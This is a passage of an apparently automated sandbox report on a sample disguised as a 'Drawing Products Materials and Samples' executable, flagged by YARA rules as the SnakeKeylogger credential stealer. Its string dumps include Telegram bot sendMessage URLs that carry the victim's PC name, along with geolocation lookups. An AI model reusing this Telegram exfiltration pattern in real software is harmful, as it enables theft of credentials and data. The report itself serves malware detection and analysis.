                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20a
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE4000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BD2763DD2
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.000000003496A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.000000003496A000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/79.127.132.20
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034AA6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/79.127.132.20$
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/Google
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0Google
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DC8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromeGoogle
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DBA000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=backslash&sca_esv=620c24330b4497e4&sca_upv=1&ei=UDzhZpjjMZyIptQPqai-
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8backslash
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB3000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC1000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8https://www.google.com/search?q=ba
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=tedst&oq=tedst&gs_lcrp=EgZjaHJvbWUyBggAEEUYOdIBBzkwNGowajSoAgCwAgE&s
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedst
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DFE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedst;
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtedst%26oq%3Dtedst%2
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.30:49820 version: TLS 1.2
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00404FC7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC7

                System Summary

                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sampleStatic PE information: Filename: Drawing_Products_Materials_and_Samples_IMG.exe
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_004030EF EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030EF
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe File created: C:\Windows\resources\0409
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373608E02_2_373608E0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D5FE02_2_373D5FE0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D66882_2_373D6688
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D36C82_2_373D36C8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D6B3F2_2_373D6B3F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D83382_2_373D8338
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DD9372_2_373DD937
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DF1302_2_373DF130
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D83282_2_373D8328
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D9B202_2_373D9B20
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DF11F2_2_373DF11F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D9B0F2_2_373D9B0F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DB3082_2_373DB308
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DA9782_2_373DA978
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D65722_2_373D6572
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DA9682_2_373DA968
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DC1602_2_373DC160
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DC1512_2_373DC151
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D6B502_2_373D6B50
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DD9482_2_373DD948
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DB7BF2_2_373DB7BF
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DCFB82_2_373DCFB8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D79A82_2_373D79A8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DCFA72_2_373DCFA7
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D1BA02_2_373D1BA0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DE7A02_2_373DE7A0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DE79A2_2_373DE79A
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D79972_2_373D7997
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D91902_2_373D9190
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D1B902_2_373D1B90
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D91802_2_373D9180
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DF5F82_2_373DF5F8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D87F02_2_373D87F0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DF5EE2_2_373DF5EE
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D9FE82_2_373D9FE8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D9FD82_2_373D9FD8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DB7D02_2_373DB7D0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D5FD02_2_373D5FD0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DAE2F2_2_373DAE2F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DC6282_2_373DC628
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D70182_2_373D7018
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DC6172_2_373DC617
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DDE102_2_373DDE10
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D70072_2_373D7007
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DDE062_2_373DDE06
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D88002_2_373D8800
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D7E702_2_373D7E70
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DD4702_2_373DD470
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DEC682_2_373DEC68
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D7E602_2_373D7E60
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D96582_2_373D9658
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DEC582_2_373DEC58
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D96472_2_373D9647
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DAE402_2_373DAE40
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D36B82_2_373D36B8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D8CB72_2_373D8CB7
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DA4B02_2_373DA4B0
